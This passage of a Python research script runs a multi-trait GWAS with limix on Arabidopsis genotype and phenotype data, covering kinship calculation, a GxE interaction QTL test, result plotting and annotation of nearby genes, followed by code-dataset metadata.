geno_acc_ids = list(genofile[\"/accessions\"].value)\n pheno_geno_acc_intersect = list(set(geno_acc_ids) & set(self.phenotypes.index))\n geno_acc_idx = np.in1d(genofile['/accessions'], pheno_geno_acc_intersect)\n snps = genofile[\"/snps\"][:, geno_acc_idx]\n geno_acc_ids = np.array(geno_acc_ids)[geno_acc_idx]\n\n chr_names = genofile['positions'].attrs.get('chrs')\n chr_regions = np.array(genofile['positions'].attrs.get('chr_regions'))\n geno_chroms = []\n for ix, reg in enumerate(chr_regions):\n geno_chroms.extend(np.repeat(chr_names[ix], reg[1] - reg[0]))\n pos = genofile['/positions'].value\n sys.stdout.write(\"ok.\\n\")\n\n macs = np.array(snps.sum(axis=1)).astype(int)\n macs_th = (macs >= self.mac_thres) & (macs <= snps.shape[0] - self.mac_thres)\n snps = snps[macs_th, :]\n sys.stdout.write(\"removed {:d} snps because of MAC threshold {:d}. (Remaining snps: {:d}.)\\n\"\n .format(pos.shape[0] - snps.shape[0], self.mac_thres, snps.shape[0]))\n pos = pos[macs_th]\n geno_chroms = np.array(geno_chroms)[macs_th]\n\n snps = pd.DataFrame(snps, index=pd.MultiIndex.from_arrays([geno_chroms, pos], names=('chr', 'pos')), columns=geno_acc_ids)\n snps = snps.reindex_axis(sorted(snps.columns), axis=1)\n\n accs_no_geno_info = np.array(self.phenotypes.index)[\n np.invert(np.in1d(self.phenotypes.index, pheno_geno_acc_intersect))]\n if accs_no_geno_info.size > 0:\n self.phenotypes.drop(accs_no_geno_info, inplace=True)\n sys.stdout.write(\"no genotype information for accessions: {}. Removed them from list of phenotypes.\\n\".format(\n accs_no_geno_info))\n\n self.ibs = np.array(kinship.calc_ibs_kinship(snps.values))\n\n # # snps.index = pd.MultiIndex.from_arrays([geno_chroms, pos])\n # #geno_acc_ids\n # for ix, reg in enumerate(chr_regions):\n # self.chromosomes[reg[0]:reg[1]] = self.chr_names[ix]\n #\n # self.iid = sorted(list(set(geno_acc_ids) & set(self.phenotypes.index)))\n # del geno_acc_ids\n #\n # sys.stdout.write(\"genotype-phenotype intersection is {} accessions.\\n\".format(len(self.iid)))\n #\n # snps = np.array(snps.loc[self.iid])\n # snpsshape = snps.shape\n #\n #\n # ts = snps[:, macs_th]\n # sys.stdout.write(\"creating kinship matrix ... \")\n # sys.stdout.flush()\n # start = time.time()\n # self.ibs = kinship.calc_ibs_kinship(ts.T)\n #\n # # self.bnorm_K = kinship.scale_k(ibs).astype(np.float64)\n # elapsed = time.time() - start\n # sys.stdout.write(\"ok. ({} s)\\n\".format(elapsed))\n\n # self.used_snp_pos = pos[macs_th]\n self.macs = macs[macs_th]\n self.mafs = self.macs / float(snps.shape[0])\n # self.chromosomes = self.chromosomes[macs_th]\n # ts=sub_snps[:,(sumts(sub_snps.shape[0]*0.01))]\n ts_norm = snps.values.T.astype(float)\n ts_norm = (ts_norm - ts_norm.mean(axis=0)) / ts_norm.std(axis=0)\n self.ts_norm = pd.DataFrame(ts_norm, index=snps.columns, columns=snps.index)\n return\n\n # def create_kinship(self):\n # sys.stdout.write(\"creating kinship matrix ... \")\n # sys.stdout.flush()\n # sub_snps = self.snps.loc[self.iid]\n # sub_snps = np.array(sub_snps)\n # sub_snps = sub_snps.astype(np.float64)\n #\n # # self.snps = self.snps.loc[self.iid]\n # # sumts = self.snps.sum(axis=0)\n # # ts = self.snps[:, (sumts != 0) & (sumts != self.snps.shape[0])]\n # # self.used_snp_pos = self.snps.columns[(sumts != 0) & (sumts != self.snps.shape[0])].astype(np.float64)\n # mac = sub_snps.sum(axis=0)\n # maf = float(mac)/sub_snps.shape[0]\n # ts = sub_snps[:, (mac != 0) & (mac != sub_snps.shape[0])]\n # self.used_snp_pos = self.snps.columns[(mac != 0) & (mac != sub_snps.shape[0])].astype(np.float64)\n # # ts=sub_snps[:,(sumts(sub_snps.shape[0]*0.01))]\n # self.ts_norm = (ts - ts.mean(axis=0)) / ts.std(axis=0)\n #\n # start = time.time()\n # self.ibs = kinship.calc_ibd_kinship(ts.T)\n # elapsed = time.time() - start\n # sys.stdout.write(\"ok. ({} s)\\n\".format(elapsed))\n\n def box_cox_transform(self, values, lambda_range=(-2.0, 2.0), lambda_increment=0.1, verbose=False,\n method='standard'):\n \"\"\"\n Performs the Box-Cox transformation, over different ranges, picking the optimal one w. respect to normality.\n \"\"\"\n from scipy import stats\n a = sp.array(values)\n if method == 'standard':\n vals = (a - min(a)) + 0.1 * sp.std(a)\n else:\n vals = a\n sw_pvals = []\n lambdas = sp.arange(lambda_range[0], lambda_range[1] + lambda_increment, lambda_increment)\n for l in lambdas:\n if l == 0:\n vs = sp.log(vals)\n else:\n vs = ((vals ** l) - 1) / l\n r = stats.shapiro(vs)\n if sp.isfinite(r[0]):\n pval = r[1]\n else:\n pval = 0.0\n sw_pvals.append(pval)\n # log.info(sw_pvals)\n i = sp.argmax(sw_pvals)\n l = lambdas[i]\n if l == 0:\n vs = sp.log(vals)\n else:\n vs = ((vals ** l) - 1) / l\n # self._perform_transform(vals,\"box-cox\")\n sys.stdout.write('optimal lambda was %0.1f\\n' % l)\n return vals\n\n def do_qtl(self):\n pheno_norm = self.phenotypes.values.astype(float)\n p1 = pheno_norm[:, 0]\n p2 = pheno_norm[:, 1]\n p1 = (p1 - p1.mean()) / p1.std()\n p2 = (p2 - p2.mean()) / p2.std()\n pheno_norm = np.vstack([p1, p2]).T\n\n # p1 = np.array(self.phenotypes[[0]].loc[self.iid]).astype(np.float64)\n # p1 = (p1 - p1.min()) / (p1.max() - p1.min())\n # p2 = np.array(self.phenotypes[[1]].loc[self.iid]).astype(np.float64)\n # p2 = (p2 - p2.min()) / (p2.max() - p2.min())\n # pheno_norm = np.concatenate((p1, p2), axis=1)\n\n\n # exp transform (does not converge)\n\n # sqrt transform (does not converge)\n # p1 = np.array(self.phenotypes[[0]].loc[self.iid]).astype(np.float64)\n # p1 = np.sqrt((p1 - p1.min()) + 0.1 * np.std(p1))\n # p2 = np.array(self.phenotypes[[1]].loc[self.iid]).astype(np.float64)\n # p2 = np.sqrt((p2 - p2.min()) + 0.1 * np.std(p2))\n # pheno_norm = np.concatenate((p1, p2), axis=1)\n\n # pheno = np.array(self.phenotypes[[0, 1]].loc[self.iid])\n # pheno_norm = (pheno - pheno.mean(axis=0)) / pheno.std(axis=0)\n\n # box - cox - transform (does not converge)\n # p1 = np.array(self.phenotypes[[0]].loc[self.iid]).astype(np.float64)\n # p1 = self.box_cox_transform(p1)\n # p2 = np.array(self.phenotypes[[1]].loc[self.iid]).astype(np.float64)\n # p2 = self.box_cox_transform(p2)\n # pheno_norm = np.concatenate((p1, p2), axis=1)\n\n # ascombe transform (does not converge)\n # p1 = np.array(self.phenotypes[[0]].loc[self.iid]).astype(np.float64)\n # p1 = 2.0 * sp.sqrt(p1 + 3.0 / 8.0)\n # p2 = np.array(self.phenotypes[[1]].loc[self.iid]).astype(np.float64)\n # p2 = 2.0 * sp.sqrt(p2 + 3.0 / 8.0)\n # pheno_norm = np.concatenate((p1, p2), axis=1)\n\n\n\n # QTL\n n_pheno = pheno_norm.shape[1] # number of traits\n # N = len(self.ibs.shape[1]) # number of accessions\n covs = None\n Acovs = None\n K1r = self.ibs\n covar_type = 'freeform'\n\n # Testing for GxE effect\n Asnps0 = sp.ones((1, n_pheno)) # common effects: degree of freedom is 1\n Asnps1 = sp.zeros((2, n_pheno))\n Asnps1[0, :] = 1.0\n Asnps1[1, 0] = 1.0\n\n sys.stdout.write(\"calculating qtl ... \\n\")\n sys.stdout.flush()\n start = time.time()\n self.pvalues = qtl.qtl_test_interaction_lmm_kronecker(snps=self.ts_norm.values, phenos=pheno_norm, covs=covs,\n Acovs=Acovs,\n Asnps0=Asnps0,\n Asnps1=Asnps1, K1r=K1r)\n elapsed = time.time() - start\n sys.stdout.write(\"qtl finished. ({} s)\\n\".format(elapsed))\n\n def write_results(self, outputdir):\n if not os.path.isdir(outputdir):\n sys.stdout.write(\"creating output directory: {} ... \".format(outputdir))\n sys.stdout.flush()\n os.makedirs(outputdir)\n sys.stdout.write(\"ok.\\n\")\n sys.stdout.flush()\n\n sys.stdout.write(\"plotting and writing results ... \\n\")\n sys.stdout.flush()\n pvalues_inter = np.array(self.pvalues)\n pvalues_inter = pvalues_inter[:, 0, :]\n\n # if rnr is not None:\n # fileprefix = \"{}-mac{}-run{}\".format(\"-x-\".join(self.phenotypes.columns), self.mac_thres, rnr)\n # else:\n fileprefix = \"{}-mac{}\".format(\"-x-\".join(self.phenotypes.columns), self.mac_thres)\n\n # specific (G x E)\n sys.stdout.write(\"... writing specific interaction results ... \")\n start = time.time()\n\n pos = np.array(list(self.ts_norm.columns.values))\n chr_names = set(pos[:, 0].astype(np.str))\n\n gwas_result = res.GWASResult(chr_names, pos[:, 0].astype(np.str),\n pos[:, 1].astype(np.int), pvalues_inter[0],\n dict(mafs=self.mafs, macs=self.macs),\n additional_columns={})\n # gwas_result.save_as_csv(os.path.join(outputdir, \"{}_specific_pvals.csv\".format(fileprefix)))\n gwas_result.save_as_hdf5(os.path.join(outputdir, \"{}_specific_pvals.hdf5\".format(fileprefix)))\n gplt.plot_gwas_result(gwas_result, os.path.join(outputdir, \"{}_specific_manhattan.png\".format(fileprefix)),\n mac=self.mac_thres)\n gplt.plot_qq(gwas_result, os.path.join(outputdir, \"{}_specific_qq.png\".format(fileprefix)))\n sys.stdout.write(\"ok ({:f} s)\\n\".format(time.time() - start))\n\n # common\n sys.stdout.write(\"... writing common interaction results ... \")\n start = time.time()\n gwas_result = res.GWASResult(chr_names, pos[:, 0].astype(np.str),\n pos[:, 1].astype(np.int), pvalues_inter[1],\n dict(mafs=self.mafs, macs=self.macs),\n additional_columns={})\n # gwas_result.save_as_csv(os.path.join(outputdir, \"{}_common_pvals.csv\".format(fileprefix)))\n gwas_result.save_as_hdf5(os.path.join(outputdir, \"{}_common_pvals.hdf5\".format(fileprefix)))\n gplt.plot_gwas_result(gwas_result, os.path.join(outputdir, \"{}_common_manhattan.png\".format(fileprefix)),\n mac=self.mac_thres)\n gplt.plot_qq(gwas_result, os.path.join(outputdir, \"{}_common_qq.png\".format(fileprefix)))\n sys.stdout.write(\"ok ({:f} s)\\n\".format(time.time() - start))\n\n # any\n sys.stdout.write(\"... writing any interaction results ... \")\n start = time.time()\n gwas_result = res.GWASResult(chr_names, pos[:, 0].astype(np.str),\n pos[:, 1].astype(np.int), pvalues_inter[2],\n dict(mafs=self.mafs, macs=self.macs),\n additional_columns={})\n # gwas_result.save_as_csv(os.path.join(outputdir, \"{}_any_pvals.csv\".format(fileprefix)))\n gwas_result.save_as_hdf5(os.path.join(outputdir, \"{}_any_pvals.hdf5\".format(fileprefix)))\n gplt.plot_gwas_result(gwas_result, os.path.join(outputdir, \"{}_any_manhattan.png\".format(fileprefix)),\n mac=self.mac_thres)\n gplt.plot_qq(gwas_result, os.path.join(outputdir, \"{}_any_qq.png\".format(fileprefix)))\n sys.stdout.write(\"ok ({:f} s)\\n\".format(time.time() - start))\n sys.stdout.write(\"ok.\\n\")\n\n def do_genehunter(self, hunter_db, pval_thres=1.0e-5, mac_thres=10, udistance=4000, ddistance=4000, feature_depth=1,\n fdr_alpha=0.05, output_prefix=None):\n dbextract = GeneAnnotationDbExtractor(hunter_db)\n sys.stdout.write(\"gene hunter using database: {}\\n\".format(hunter_db))\n\n all_peaks_df = None\n origin = \"{}-mac{}\".format(\"-x-\".join(self.phenotypes.columns), self.mac_thres)\n interact_labels = [\"specific\", \"common\", \"any\"]\n for interact_ix in range(3):\n select_ix = np.where((self.pvalues[interact_ix][0] <= pval_thres) & (self.macs >= mac_thres))[0]\n if select_ix.size == 0:\n continue\n pos = np.array(list(self.ts_norm.columns.values))\n\n row = pd.Series(index=[\"Original_file\",\n \"Chromosome\",\n \"SNP_pos\",\n \"GWAS_pvalue\",\n \"MAC\",\n \"Bonferroni_{:.3f}_threshold\".format(fdr_alpha),\n \"BH_{:.3f}_threshold\".format(fdr_alpha),\n \"BH_FDR_{:.3f}_adjusted\".format(fdr_alpha),\n \"BH_FDR_{:.3f}_rejected\".format(fdr_alpha),\n \"Gene_start\",\n \"Gene_end\",\n \"Gene_orientation\",\n \"Relative_distance\",\n \"SNP_relative_position\",\n \"Target_AGI\",\n \"Target_element_type\",\n \"Target_sequence_type\",\n \"Target_annotation\",\n \"Target_attributes\"])\n row[\"Original_file\"] = \"{}_{}_pvals\".format(origin, interact_labels[interact_ix])\n # genes_df = none\n for ix in select_ix:\n ext_row = row.copy(deep=True)\n ext_row[\"Chromosome\"] = pos[ix, 0]\n ext_row[\"SNP_pos\"] = pos[ix, 1]\n ext_row[\"GWAS_pvalue\"] = self.pvalues[interact_ix][0][ix]\n ext_row[\"MAC\"] = self.macs[ix]\n\n genes = dbextract.extract_loc_uddist(pos[ix, 0], pos[ix, 1], udistance, ddistance)\n sys.stdout.write(\n \" peak: {}, pos {} -> {} genes in range\\n\".format(pos[ix, 0], pos[ix, 1], len(genes)))\n if len(genes) == 0:\n if all_peaks_df is not None:\n all_peaks_df = pd.concat([all_peaks_df, ext_row.to_frame().transpose()], axis=0,\n ignore_index=True)\n else:\n all_peaks_df = ext_row.to_frame().transpose()\n continue\n\n for g in genes:\n ext_row = pd.Series(row)\n ext_row[\"Gene_start\"] = g.start\n ext_row[\"Gene_end\"] = g.end\n ext_row[\"Gene_orientation\"] = g.strand\n if g.strand == '+':\n ext_row[\"Relative_distance\"] = pos[ix, 1] - g.start\n else:\n ext_row[\"Relative_distance\"] = g.start - pos[ix, 1]\n\n if g.start <= pos[ix, 1] <= g.end:\n ext_row[\"SNP_relative_position\"] = \"in gene\"\n elif pos[ix, 1] < g.start:\n if g.strand == '+':\n ext_row[\"SNP_relative_position\"] = \"upstream\"\n else:\n ext_row[\"SNP_relative_position\"] = \"downstream\"\n else:\n if g.strand == '+':\n ext_row[\"SNP_relative_position\"] = \"downstream\"\n else:\n ext_row[\"SNP_relative_position\"] = \"upstream\"\n ext_row[\"Target_AGI\"] = g.id\n ext_row[\"Target_element_type\"] = g.feature\n ext_row[\"Target_sequence_type\"] = g.sequencetype\n ext_row[\"Target_annotation\"] = \"NA\"\n ext_row[\"Target_attributes\"] = g.attribute\n\n if all_peaks_df is not None:\n all_peaks_df = pd.concat([all_peaks_df, ext_row.to_frame().transpose()], axis=0,\n ignore_index=True)\n else:\n all_peaks_df = ext_row.to_frame().transpose()\n\n if feature_depth >= 1:\n for rna in g.rna:\n ext_row = pd.Series(row)\n ext_row[\"Gene_start\"] = rna.start\n ext_row[\"Gene_end\"] = rna.end\n ext_row[\"Gene_orientation\"] = rna.strand\n if rna.strand == '+':\n ext_row[\"Relative_distance\"] = pos[ix, 1] - rna.start\n else:\n ext_row[\"Relative_distance\"] = rna.start - pos[ix, 1]\n\n if rna.start <= pos[ix, 1] <= rna.end:\n ext_row[\"SNP_relative_position\"] = \"in feature\"\n elif pos[ix, 1] < rna.start:\n if rna.strand == '+':\n ext_row[\"SNP_relative_position\"] = \"upstream\"\n else:\n ext_row[\"SNP_relative_position\"] = \"downstream\"\n else:\n if rna.strand == '+':\n ext_row[\"SNP_relative_position\"] = \"downstream\"\n else:\n ext_row[\"SNP_relative_position\"] = \"upstream\"\n ext_row[\"Target_AGI\"] = rna.id\n ext_row[\"Target_element_type\"] = rna.feature\n ext_row[\"Target_sequence_type\"] = rna.sequencetype\n if rna.short_annotation is not None:\n ext_row[\"Target_annotation\"] = rna.short_annotation\n else:\n ext_row[\"Target_annotation\"] = \"NA\"\n ext_row[\"Target_attributes\"] = rna.attribute\n\n all_peaks_df = pd.concat([all_peaks_df, ext_row.to_frame().transpose()], axis=0,\n ignore_index=True)\n sys.stdout.write(\"\\n\")\n if output_prefix is not None:\n output_prefix = output_prefix.replace(\"_\", \"-\")\n out_path = \"{}_gene-hunter_u{:d}_d{:d}_pval{:.3e}_mac{:d}_fdr{:.3f}.txt\".format(output_prefix,\n udistance,\n ddistance,\n pval_thres,\n mac_thres,\n fdr_alpha)\n out_path = os.path.join(args.dir, out_path)\n all_peaks_df.to_csv(out_path, sep='\\t', header=True, index=False)\n else:\n all_peaks_df.to_string(sys.stdout, header=True, index=False)\n\n\ndef run_by_environment_vars():\n sys.stdout.write(\"MTL run by environment variables.\\n\")\n tfile1 = os.environ['MTL_FILE1']\n tfile2 = os.environ['MTL_FILE2']\n tcols1str = os.environ['MTL_COLS1']\n tcols2str = os.environ['MTL_COLS2']\n tprefix1 = os.environ['MTL_PREFIX1']\n tprefix2 = os.environ['MTL_PREFIX2']\n snpsdb = os.environ['MTL_SNPS']\n macthres = os.environ['MTL_MAC']\n outputdir = os.environ['MTL_OUTDIR']\n jobid = int(os.getenv('PBS_ARRAY_INDEX', '0'))\n filesep = os.getenv('MTL_FILE_SEPARATOR', '\\t')\n\n dogenehunter = os.getenv('MTL_DO_GENEHUNTER', 'true')\n if dogenehunter.lower() == 'true':\n import argparse\n hunter_args = argparse.Namespace()\n hunter_args.db = os.environ['GHUNTER_DB']\n hunter_args.dir = outputdir\n\n sys.stdout.write(\"using the following options:\\n\")\n sys.stdout.write(\"trait file 1 : {}\\n\".format(tfile1))\n sys.stdout.write(\"trait file 2 : {}\\n\".format(tfile2))\n sys.stdout.write(\"file separator : {}\\n\".format(filesep))\n sys.stdout.write(\"column string 1: {}\\n\".format(tcols1str))\n sys.stdout.write(\"column string 2: {}\\n\".format(tcols2str))\n sys.stdout.write(\"prefix 1 : {}\\n\".format(tprefix1))\n sys.stdout.write(\"prefix 2 : {}\\n\".format(tprefix2))\n sys.stdout.write(\"snps database : {}\\n\".format(snpsdb))\n sys.stdout.write(\"mac threshold : {}\\n\".format(macthres))\n sys.stdout.write(\"job ID : {}\\n\".format(jobid))\n\n tcols1 = eval(tcols1str)\n tcols2 = eval(tcols2str)\n # tcols1 = [int(x) for x in tcols1str.lstrip('[').rstrip(']').split(',')]\n # tcols2 = [int(x) for x in tcols2str.lstrip('[').rstrip(']').split(',')]\n\n mt = MTL(int(macthres))\n mt.read_phenotype_col(tfile1, tcols1[jobid], tprefix1, sep=filesep)\n mt.read_phenotype_col(tfile2, tcols2[jobid], tprefix2, sep=filesep)\n mt.read_genotypes(snpsdb)\n mt.do_qtl()\n mt.write_results(outputdir)\n\n\nif __name__ == \"__main__\":\n # run_by_environment_vars()\n\n workdir = \"/net/gmi.oeaw.ac.at/busch/lab_new/Christian/mtl-tempstress\"\n genotypedir = \"/data/gwas/genotypes_for_pygwas/1.0.0/regmap_horton_et_al_2012\"\n\n limtmm = MTL(mac_thres=1)\n i = 1\n j = 13\n # limtmm.read_phenotype_col(os.path.join(workdir, \"bao_Std.txt\"), i, colprefix=\"ctrl{:d}\".format(i), sep=\"\\t\")\n # limtmm.read_phenotype_col(os.path.join(workdir, \"bao_Cd+.txt\"), j, colprefix=\"cd+{:d}\".format(j), sep=\"\\t\")\n limtmm.read_phenotype_col(os.path.join(workdir, \"29HT_acc_phenotypes_Brat.txt\"), i, colprefix=\"HT{:d}\".format(i))\n limtmm.read_phenotype_col(os.path.join(workdir, \"Climond_Bio35_busch_lab_all_accessions.csv\"), j, colprefix=\"Cli{:d}\".format(j))\n # limtmm.write_phenotypes(os.path.join(workdir, \"used_phenotypes_dbg_{}-{}.csv\".format(i, j)))\n limtmm.read_genotypes(os.path.join(genotypedir, \"all_chromosomes_binary.hdf5\"))\n limtmm.do_qtl()\n limtmm.write_results(os.path.join(workdir, \"ht-mtl-results\"))\n # limtmm.do_genehunter(\n # \"/home/GMI/christian.goeschl/devel/pycharm/GeneHunter/db/At30_20101214_genes_transposons.sqlite\")\n\n\n # for i in range(3, 23):\n # limtmm = MtmmLimix(mac_thres=5)\n # limtmm.read_phenotype_col(os.path.join(workdir, \"20170301_Zn_MS_RLd2.csv\"), i, colprefix=\"s{:d}\".format(i), sep=\",\")\n # limtmm.read_phenotype_col(os.path.join(workdir, \"20170301_Zn_MS_RLd2.csv\"), 8, colprefix=\"c{:d}\".format(i), sep=\",\")\n # limtmm.read_genotypes(os.path.join(workdir, \"all_chromosomes_binary.hdf5\"))\n # limtmm.do_qtl(os.path.join(workdir, \"debug-strigo-vs-ctrl\"))\n #\n # limtmm = MtmmLimix(mac_thres=5)\n # limtmm.read_phenotype_col(os.path.join(workdir, \"GWASinput_2016_strigolactone_means-na.csv\"), i, colprefix=\"s{:d}\".format(i), sep=\",\")\n # limtmm.read_phenotype_col(os.path.join(workdir, \"GWASinput_2016_control_means-na.csv\"), 8, colprefix=\"c{:d}\".format(i), sep=\",\")\n # limtmm.read_genotypes(os.path.join(workdir, \"all_chromosomes_binary.hdf5\"))\n # limtmm.do_qtl(os.path.join(workdir, \"debug-strigo-vs-ctrl\"))\n", "sub_path": "mtl/mtl.py", "file_name": "mtl.py", "file_ext": "py", "file_size_in_byte": 26677, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 41, "usage_type": "attribute"}, {"api_name": "csv.Sniffer", "line_number": 43, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 82, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 82, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 83, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 97, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 102, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.MultiIndex.from_arrays", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.invert", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 114, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "pygwas_modules.kinship.calc_ibs_kinship", "line_number": 117, "usage_type": "call"}, {"api_name": "pygwas_modules.kinship", "line_number": 117, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 150, "usage_type": "call"}, {"api_name": "scipy.array", "line_number": 182, "usage_type": "call"}, {"api_name": "scipy.std", "line_number": 184, "usage_type": "call"}, {"api_name": "scipy.arange", "line_number": 188, "usage_type": "call"}, {"api_name": "scipy.log", "line_number": 191, "usage_type": "call"}, {"api_name": "scipy.stats.shapiro", "line_number": 194, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 194, "usage_type": "name"}, {"api_name": "scipy.isfinite", "line_number": 195, "usage_type": "call"}, {"api_name": "scipy.argmax", "line_number": 201, "usage_type": "call"}, {"api_name": "scipy.log", "line_number": 204, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 208, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 217, "usage_type": "call"}, {"api_name": "scipy.ones", "line_number": 263, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 268, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 269, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 269, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 270, "usage_type": "call"}, {"api_name": "limix.qtl.qtl_test_interaction_lmm_kronecker", "line_number": 271, "usage_type": "call"}, {"api_name": "limix.qtl", "line_number": 271, "usage_type": "name"}, {"api_name": "time.time", "line_number": 275, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 276, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 280, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 280, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 281, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 281, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 282, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 283, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 283, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 284, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 284, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 286, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 286, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 287, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 287, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 288, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 297, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 297, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.str", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygwas_modules.result.GWASResult", "line_number": 303, "usage_type": "call"}, {"api_name": "pygwas_modules.result", "line_number": 303, "usage_type": "name"}, {"api_name": "numpy.str", "line_number": 303, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 304, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path", "line_number": 308, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_gwas_result", "line_number": 309, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 309, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 309, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_qq", "line_number": 311, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 311, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 311, "usage_type": "call"}, {"api_name": "os.path", "line_number": 311, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 312, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 312, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 312, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 315, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 315, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 316, "usage_type": "call"}, {"api_name": "pygwas_modules.result.GWASResult", "line_number": 317, "usage_type": "call"}, {"api_name": "pygwas_modules.result", "line_number": 317, "usage_type": "name"}, {"api_name": "numpy.str", "line_number": 317, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 318, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_gwas_result", "line_number": 323, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 323, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 323, "usage_type": "call"}, {"api_name": "os.path", "line_number": 323, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_qq", "line_number": 325, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 325, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path", "line_number": 325, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 326, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 326, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 326, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 329, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 329, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 330, "usage_type": "call"}, {"api_name": "pygwas_modules.result.GWASResult", "line_number": 331, "usage_type": "call"}, {"api_name": "pygwas_modules.result", "line_number": 331, "usage_type": "name"}, {"api_name": "numpy.str", "line_number": 331, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 